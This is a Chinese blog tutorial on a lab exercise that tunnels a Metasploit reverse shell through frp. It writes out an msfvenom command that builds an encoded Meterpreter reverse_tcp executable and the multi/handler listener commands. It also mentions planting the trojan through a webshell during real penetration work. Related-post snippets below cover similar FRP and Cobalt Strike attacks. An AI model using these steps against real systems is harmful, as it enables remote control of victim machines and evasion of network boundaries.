【内网安全】利用frp实现内网穿透

已于 2023-11-29 17:43:06 修改
阅读量284 收藏
点赞数 2
分类专栏: # 内网安全 文章标签: frp 代理 msf
于 2023-10-13 16:22:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/133813373
版权

文章目录


image-20231013144130293

代理使用场景

1、拿下远程web服务器

2、webshell链接不稳定,需要使用稳定的木马程序

3、远程服务器无法直接链接攻击者电脑

4、需要借助公网vps转发来自失陷服务器的木马流量

5、借助frp服务端(vps)和客户端(内网攻击者)建立隧道

6、当vps某一个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量

环境准备

kali攻击机 192.168.8.8 (NAT模式)

win10 受害主机 10.9.75.113 (桥接模式)

真实机win11: 10.9.75.219

网络连通性测试:

win10是ping不通kali的

实现效果:

win10执行木马,把权限 直接反弹给kali

frps放真实机win11上,frpc上kali上

msf木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.219 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

# 生成的木马要连接谁,可以直接连接kali,但是现在受害者主机是ping不通kali的,一个在内网,一个在公网

# 将LHOST 是真实机win11的地址,跟真实机做隧道

image-20231013151648561

生成shell.exe

image-20231013150411213

如果是实际的渗透测试,可以通过文件上传使用webshell把木马上传

现在是测试环境,直接将生成的木马放到受害主机win10里

监听

1、启动msf :msfconsole
2、载入监控模块  :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lport 4444
set lhost 127.0.0.1
run

启动监听,等待木马连接

image-20231013152345523

查看监听端口

ss -antpl

image-20231013151753248

这个时候在受害者主机里点击shell.exe是没有反应的,因为木马去找真实机去了,所以现在需要建立隧道

frps

frps.exe -c frps.ini

# -c 指定配置文件

image-20231013151956927

搭建隧道的第一步:客户端主动去连服务端,所以这个时候只能等待客户端来 连接

frpc

查看客户端默认配置文件

image-20231013152507991

进行修改

image-20231013153104297

启动frp客户端

image-20231013153232304

这个时候 查看真实机frps

image-20231013153458012

image-20231013153519375

等待接受数据

来到win10受害主机,双击shell.exe

image-20231013153835428

代理成功!

过期的秋刀鱼-
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
解决获取真实访问用户IP,端口映射内穿透后访问者地址
kingdsq的博客
12-06 3030
部分环境应用经过端口映射后的站和应用得到的用户访问IP地址都是localhost或127.0.0.1,内穿透如何获取真实用户访问者IP地址?
FRP+MSF+注入反弹shell
dahege666的博客
04-21 4191
实验环境: XXX云ECS一台:x.x.x.x 内kali控制端:192.168.250.133 外注入后台win7主机: 操作步骤: 分别在XXX云ECS、内kali控制端搭建frp 具体方法参见: 安装frp_叶孤心丶的博客-CSDN博客_frp安装 配置 内kali控制端配置 vi frpc.ini XXX云ECS配置 vim frps.ini 启动FRP 本地Kali linux 启动 FRP ./frpc -c ./f...
frp实现p2p远程连接桌面,非服务器中转
Asachen的博客
10-19 1万+
frp实现p2p远程连接桌面,非服务器中转frp实现p2p远程连接桌面使用工具服务器端配置(frp_0.37.1_linux_amd64)客服端A【被远程的电脑】配置(frp_0.37.1_windows_amd64)客服端B【远程电脑】配置(frp_0.37.1_windows_amd64) frp实现p2p远程连接桌面 此篇文章主要目的是解决无法使用微软的远程桌面,使用向日葵卡(没充钱)的要死要活的。重要的事情说3遍,得有个公IP,公IP,公IP。这里推荐阿里云服务器购买地址「一年几十块钱」 使用
简简单单教你实现穿透
蓝星花
03-10 2万+
sudo ./bin/ngrokd -tlsKey=server.key -tlsCrt=server.crt -domain="zzmd.superboycxx.top" -httpAddr=":8081" -httpsAddr=":8082" 屁话不讲,先来看下效果: 1.搭建环境(安装git,golang) 因为Ngrok是基于Go语言编写的 ...
frpfrp穿透络代理设置,轻轻松松穿透
02-09
frp | 什么是frpfrp是一种快速反向代理,可帮助您将NAT或防火墙后面的本地服务器公开到Internet。 到目前为止,它支持TCP和UDP以及HTTP和HTTPS协议,在这些协议中,请求可以通过域名转发到内部服务。 frp还具有P2P连接模式。 目录 发展状况 frp正在开发中。 请尝试在master分支中使用最新发行版,或将dev分支用于开发中的版本。 该协议可能会在发布时更改,我们不保证向后兼容。 升级客户端和服务器时,请检查发布日志。 建筑 用法示例 首先,根据您的操作系统和体系结构从“页面下载最新程序。 使用公用IP将frps和frps.ini放入服务器A。 将frpc和frpc.ini放入局域中的服务器B(不能从公共Internet连接)。 通过SSH访问LAN中的计算机 修改frps.ini在服务器A上,并设置bind_port连接到FRP的客户:
穿透FRP工具 windows 客户端和服务端 V0.46
03-02
frp 是什么?...frp 是一个专注于内穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内服务以安全、便捷的方式通过具有公 IP 节点的中转暴露到公。 帮助文档 ...
frp32位最新版内穿透客户端工具
09-07
frp32位最新版内穿透客户端工具。frpc是一款非常专业的Windows客户端内穿透工具。它的功能十分强大,可以帮助您轻松地进行内穿透,对外提供服务,支持 tcp, http, https 等协议类型。
基于Frp的内穿透
10-30
1、基于Frp做的内穿透Ui,能够通过界面一键配置 2、需要有一个云服务器 有公Ip 3、支持端口到端口、域名访问、点对点 4、支持服务器端、客户端、点对点被访问端 如果不知道怎么配置可以联系我
frp穿透
01-09
服务器 – 客户端 frp 二、 frp下载 frp下载地址 https://github.com/fatedier/frp/releases linux平台下载的版本为:frp_版本号linux_amd64.tar.gz 解压 tar -zxvf 文件名 文件解压后: frps(frp服务端运行文件)...
穿透工具frp(windows以及linux版本)
08-09
frp穿透工具。 使用方法: 1、客户端:修改frpc.ini指向frp服务端,server_addr 指向服务端ip,server_port 指向服务端端口。然后修改要用的协议所对应的端口,type 指向协议名称,local_port 指向所对应端口,...
P2P如何实现穿透(打洞)
热门推荐
u014023993的专栏
01-20 7万+
目录 概述 P2P简介 P2P通信技术 中继(Relaying) 逆向连接(Connection reversal) UDP打洞 端点处于不同NAT 端点处于相同的NAT 固定端口绑定 空闲状态下的超时问题 TCP打洞 套接字和TCP端口的重用 打开P2P的TCP流 TCP同时打开 参考资料 概述 P2P简介 我们知道,内设备是不能直接访问公的,如果需要内...
frp穿透服务
夏天的博客
09-26 1万+
  由于公司内的一些测试需求,需要可以在外通过域名访问测试服,所以试着在外搭建了一台frp服务器来内穿透frp简介   frp是一个快速反向代理,可帮助您将NAT或防火墙后面的本地服务器暴露给Internet。现在,当请求可以通过域转发到后向Web服务时,它支持tcp,udp,http和https协议。 github地址:https://github.com/fatedier/frp...
Cobalt Strike使用 frp穿透 上线
qq_41728581的博客
03-05 3265
首先需要公ip 100多买了个国内的服务器 流泪了 要是路由器能获得公ip多好 这里部署的是 cs server和client 在同一台内主机上 如果不是 有些地方需要自行调整修改 云服务器 开启frps 首先在服务器上运行frps 精简配置就可以 (Ubuntu18开机自启 https://www.jianshu.com/p/9274b18b35e3/) frps.ini如下 [common] bind_port = 7000 如果想要转发 必须要开放防火墙 服务器的话就在安全组里边.
穿透神器frp之进阶配置——stcp及p2p模式
黄腾霄的博客
02-08 7万+
我们在上一篇文章内穿透神器frp——实现在家远程办公_mac,rdp,windows_黄腾霄的博客-CSDN博客中介绍了如何使用frp的tcp模式,在公暴露内设备的tcp服务。还根据此技术实现了对内设备的远程桌面服务访问。今天我们来分析下这种方式存在的问题,以及可以参考的解决方案。 Frp的TCP模式问题 这里主要存在2个问题。 第一个是安全问题: 试想一下,frp的tcp模式相当于你的...
frp穿透 使用stcp进行P2P穿透3389远程桌面端口实战
COCO56的博客
01-31 7058
文章目录1. 按2. 更多内穿透产品3. 硬件配置4. 待其他设备访问的客户端配置5. 访问其它设备的客户端配置6. 服务器(vps)配置7. 更多使用案例 1. 按 在IPv4统治的时代,由于公地址匮乏,无法直接点对点控制。不过我们可以借助frp进行内穿透。 注意: 即便是点对点所有数据也均要经过服务器,由于服务器仅1M的带宽,所以转发远程控制数据有些吃力。 改用stcp进行点对点访问控制后数据只是进行了加密,但全程仍要走服务器。 另外IPv6现在已基本实现了全覆盖,中共中央、国务院、工信部于2
【内穿透服务器】使用FRP实现穿透,远程访问内服务器
Deng's Blog
04-18 4万+
本文主要介绍了FRP的搭建及不同目的下的配置方式,以实现穿透,远程访问内服务器。
使用frp穿透,内穿透远程控制windows电脑,p2p远程桌面
qq_35150992的博客
01-29 2884
使用frp穿透,内穿透远程控制windows电脑,p2p远程桌面
利用CS4.0和FRP拿下“打牌”站服务器
sjyyyyyyyy的博客
10-26 1530
利用CS4.0和FRP拿下“打牌”站服务器环境的部署CS4.0服务器部署新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 环境的部署 CS4.0服务器部署 这里用的是阿里云服务器,也可以部署在本地 首先上传cs4.0压缩包
FRP不输入端口号访问http
Cooing
03-10 2万+
众所周知frp能够实现穿透,借此我们可以访问内的http,ftp,rdp等服务,但是它以端口转发的型式实现,我们每次访问http都需要加客户端的端口号,这谁忍得住啊!怎么才能不输入烦人的小尾巴呢? 首先我们在官方文档可以看到这样一段 试一下子,先给域名加一条泛解析 然后配置服务器端,这里假定你的域名为csdn.com frps.ini [common] bind_addr = 0.0.0...
frp实现穿透原理
最新发布
08-15
FRP(Fast Reverse Proxy)是一种实现穿透的工具,可以让位于内的设备通过公访问。下面是FRP实现穿透的原理: 1. FRP服务器搭建:在公上搭建一个FRP服务器,它具有公IP地址,并且可以被外部访问到。 2. FRP客户端连接:在内设备上安装FRP客户端,并配置好与FRP服务器的连接参数。客户端与服务器之间建立起持久的TCP或UDP连接。 3. 端口映射:在FRP服务器上配置需要进行端口映射的规则,包括内设备的IP地址、端口号以及对应的公端口。 4. 请求转发:当外部用户通过公访问FRP服务器上的某个端口时,FRP服务器会接收到这个请求。然后,FRP服务器将请求转发给与其建立连接的FRP客户端。 5. 内转发:FRP客户端收到来自服务器的请求后,将请求转发给内设备,以达到用户与内设备之间的通信。 6. 响应转发:内设备收到请求后,生成响应并发送给FRP客户端。FRP客户端再将响应转发给FRP服务器,最终返回给用户。 通过上述步骤,FRP实现了内设备与公之间的通信。这样,用户可以通过公访问内设备的服务或资源,而无需进行复杂的络配置和端口映射设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值